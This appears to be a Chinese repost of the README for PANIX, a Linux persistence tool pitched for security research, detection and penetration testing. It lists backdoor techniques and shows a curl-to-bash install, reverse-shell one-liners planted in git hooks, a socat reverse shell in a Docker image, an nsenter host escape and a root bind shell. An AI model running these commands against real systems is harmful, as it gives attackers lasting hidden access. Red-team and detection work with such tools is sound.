ANIX 是一款高度可定制的 Linux 持久性工具,可用于安全研究、检测工程、渗透测试、CTF 等。它优先考虑功能性而非隐身性,并且易于检测。PANIX 支持 Debian、Ubuntu 和 RHEL 等流行发行版,并且高度可定制以适应各种操作系统环境。PANIX 将与在野外观察到的最常见的 *nix 持久性机制保持同步。
特征
PANIX 提供了一套多功能的功能用于模拟和研究 Linux 持久性机制。
特征 | 描述 | Root | User |
---|---|---|---|
At Job Persistence | At job persistence | ✓ | ✓ |
Authorized Keys Persistence | Add public key to authorized keys | ✓ | ✓ |
Backdoor User | Create backdoor user with uid=0 | ✓ | ✗ |
Bind Shell | Execute backgrounded bind shell | ✓ | ✓ |
Capabilities Backdoor | Add capabilities for persistence | ✓ | ✗ |
Cron Job Persistence | Cron job persistence | ✓ | ✓ |
Create User | Create a new user | ✓ | ✗ |
Git Persistence | Git hook/pager persistence | ✓ | ✓ |
Generator Persistence | Systemd generator persistence | ✓ | ✗ |
Init.d Backdoor | SysV Init (init.d) persistence | ✓ | ✗ |
Malicious Package Backdoor | DPKG/RPM package persistence | ✓ | ✗ |
Docker Container Backdoor | Docker container with host escape | ✓ | ✓ |
MOTD Backdoor | Message Of The Day (MOTD) persistence | ✓ | ✗ |
Package Manager Persistence | Package Manager persistence (APT/YUM/DNF) | ✓ | ✗ |
/etc/passwd Modification | Add user to /etc/passwd directly | ✓ | ✗ |
Password Change | Change user password | ✓ | ✗ |
RC.local Backdoor | Run Control (rc.local) persistence | ✓ | ✗ |
Shell Profile Persistence | Shell profile persistence | ✓ | ✓ |
SSH Key Persistence | SSH key persistence | ✓ | ✓ |
Sudoers Backdoor | Sudoers persistence | ✓ | ✗ |
SUID Backdoor | SUID persistence | ✓ | ✗ |
System Binary Backdoor | System binary wrapping for persistence | ✓ | ✗ |
Systemd Service Persistence | Systemd service persistence | ✓ | ✓ |
Udev Persistence | Udev (driver) persistence | ✓ | ✗ |
XDG Autostart Persistence | XDG autostart persistence | ✓ | ✓ |
PANIX 为各种 Linux 发行版提供全面支持。
过时或自定义的 Linux 发行版可能使用不同的配置或缺少特定功能,这可能会导致未经测试的版本上的机制失败。如果默认命令失败,--custom大多数功能中的标志允许您自定义路径/命令以适合您的环境。如果这不起作用,您可以检查脚本以了解并根据您的需求进行调整。
分配 | 支持 | 已测试 |
---|---|---|
Debian | ✓ | 在 Debian 11 和 12 上经过全面测试 |
Ubuntu | ✓ | 在 Ubuntu 22.04 上进行了全面测试 |
红帽企业版 | ✓ | 在 RHEL 9 上进行了全面测试(MOTD 不可用) |
CentOS | ✓ | 在 CentOS Stream 9、7 上进行了全面测试(MOTD 不可用) |
Fedora | ✓ | 未经过全面测试 |
Arch Linux | ✓ | 未经过全面测试 |
OpenSUSE | ✓ | 未经过全面测试 |
过时或自定义的 Linux 发行版可能使用不同的配置或缺少特定功能,这可能会导致未经测试的版本上的机制失败。如果默认命令失败,--custom大多数功能中的标志允许您自定义路径/命令以适合您的环境。如果这不起作用,您可以检查脚本以了解并根据您的需求进行调整。
入门
启动并运行 PANIX 非常简单,只需从发布页面下载脚本并执行它即可:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh | bash
或者下载并手动执行:
# Download through curl or wget
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -o panix.sh
wget https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -O panix.sh
# Grant execution permissions and execute the script.
chmod +x panix.sh
./panix.sh
执行脚本将显示root或user帮助菜单,具体取决于当前用户的权限。
panix@panix-demo:~$ sudo ./panix.sh
__
|__) / | | | _/
| /~~ | | | /
@RFGroenewoud
Root User Options:
--at At job persistence
--authorized-keys Add public key to authorized keys
--backdoor-user Create backdoor user
--bind-shell Execute backgrounded bind shell
--cap Add capabilities persistence
--create-user Create a new user
--cron Cron job persistence
--docker-container Docker container with host escape
--generator Generator persistence
--git Git hook/pager persistence
--initd SysV Init (init.d) persistence
--malicious-package Build and Install a package for persistence (DPKG/RPM)
--motd Message Of The Day (MOTD) persistence (not available on RHEL derivatives)
--package-manager Package Manager persistence (APT/YUM/DNF)
--passwd-user Add user to /etc/passwd directly
--password-change Change user password
--rc-local Run Control (rc.local) persistence
--shell-profile Shell profile persistence
--ssh-key SSH key persistence
--sudoers Sudoers persistence
--suid SUID persistence
--system-binary System binary persistence
--systemd Systemd service persistence
--udev Udev (driver) persistence
--xdg XDG autostart persistence
--revert Revert most changes made by PANIX's default options
--quiet (-q) Quiet mode (no banner)
例子
该脚本应该基本上是不言自明的,但是,本节将展示一些如何使用 PANIX 的示例。
每个持久性机制都有一个单独的帮助菜单:
root@ubuntu2204:/home/ruben
# ./panix.sh --udev --help
Usage: ./panix.sh
--udev [OPTIONS]
--examples Display command examples
--default Use default udev settings
--ip <ip> Specify IP address
--port <port> Specify port number
--at | --cron | --systemd Specify the mechanism to use
--custom Use custom udev settings
--command <command> Specify custom command
--path <path> Specify custom path
每个持久性机制还具有一个--examples标志,显示默认和自定义示例,帮助您制定适合您的命令。
root@ubuntu2204:/home/ruben
# ./panix.sh --git --examples
Examples:
--default:
./panix.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager
--custom:
./panix.sh --git --custom --
command
"(nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &) &"
--path
"gitdir/.git/hooks/pre-commit"
--hook
./panix.sh --git --custom --
command
"nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &
${PAGER:-less}
"
--path
"~/.gitconfig --pager"
大多数持久性机制非常简单,并且(希望)不需要太多解释。例如,只需执行以下命令即可设置 systemd 持久性:
root@ubuntu2204:
/home/ruben
# ./panix.sh --systemd --default --ip 10.10.10.10 --port 1337
Service file created successfully!
Timer file created successfully!
Created
symlink
/etc/systemd/
system
/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/
local
/lib/systemd/
system
/dbus-org.freedesktop.resolved.timer.
[+] Systemd service persistence established!
设置持久性机制时,脚本将让您知道它是否有效,并且在需要信息来使用持久性机制的情况下,将提供其他信息。例如绑定 shell 机制:
root@ubuntu2204:/home/ruben
[
] Bind shell binary /tmp/bd64 created and executed
in
the background.
[
] The bind shell
is
listening
on
port
9001.
[
] To interact with it
from
a different system, use: nc -nv <IP>
9001
[
] Bind shell persistence established!
允许您与绑定 shell 进行交互:
❯
nc
-nv
192
.168
.211
.130
9001
(
UNKNOWN
)
[192.168.211.130]
9001 (?)
open
whoami
root
对于具有附加内置功能的机制也是如此,例如 Docker 持久性机制,具有内置的根主机逃逸:
ruben@ubuntu2204
:~
$ sudo ./panix.sh --docker-container --ip
192.168
.
211.131
--port
330
[+] Building
10.4
s (
9
/
9
) FINISHED
docker:
default
=> [internal] load build definition from Dockerfile
0
.0s
=> => transferring
dockerfile:
722
B
0
.0s
=> [internal] load metadata for docker.io/library/
alpine:
latest
2.1
s
=> [internal] load .dockerignore
0
.0s
=> => transferring
context:
2
B
0
.0s
=> [
1
/
5
] FROM docker.io/library/
alpine:
latest@sha256
:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0
0
.
8
s
=> => resolve docker.io/library/
alpine:
latest@sha256
:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0
0
.0s
=> =>
sha256:
b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e
0
1.85
kB /
1.85
kB
0
.0s
=> =>
sha256:
dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76
528
B /
528
B
0
.0s
=> =>
sha256:
a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687
1.47
kB /
1.47
kB
0
.0s
=> =>
sha256:
ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99
3.62
MB /
3.62
MB
0
.
4
s
=> => extracting
sha256:
ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99
0
.
2
s
=> [
2
/
5
] RUN apk add --no-cache bash socat sudo util-linux procps
4.4
s
=> [
3
/
5
] RUN adduser -D lowprivuser
0
.
6
s
=> [
4
/
5
] RUN echo
'#!/bin/bash'
>
/usr/local
/bin/entrypoint
.sh && echo
'while true; do /bin/bash -c "socat exec:"/bin/bash",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330" 0.8s
=> [5/5] RUN echo '
#!/bin/bash' > /usr/local/bin/escape.sh && echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' >> /usr/local/bin/escape.sh && chmod +x /usr/local/bin/escape.sh && ec 0.8s
=> exporting to image
0
.
6
s
=> => exporting layers
0
.
6
s
=> => writing image
sha256:
b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d24879
0
0
.0s
=> => naming to docker.io/library/malicious-container
0
.0s
86
ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef
[+] Persistence through malicious Docker container complete.
[+] To escape the container with root privileges, run
'/usr/local/bin/escape.sh'
.
它向您展示了如何逃离容器并访问主机。
❯ nc -nvlp
330
listening on [
any
]
330
...
connect to [
192.168
.211
.131
]
from
(UNKNOWN) [
192.168
.211
.130
]
43400
86
ce6b00e872:
/$ /u
sr/local/bin/
escape
.sh
/usr/local/bin/
escape
.sh
root
:~#
PANIX 可以通过命令清理大部分垃圾--revert。
root@ubuntu2204:/home/ruben
[
] Running
as
root...
[
] Cleaning Systemd persistence methods...
[
] Successfully cleaned persistence method Systemd
[
] Cleaning Cron persistence methods...
[
] Successfully cleaned persistence method Cron
...
[
] Cleaning Docker persistence methods...
[
] Successfully cleaned persistence method Docker
[
] Cleaning Malicious package persistence methods...
[
] Successfully cleaned persistence method Malicious package
-
下载
https:
//github.com/Aegrah/PANIX
原文始发于微信公众号(Ots安全):PANIX 是一款高度可定制的 Linux 持久性工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论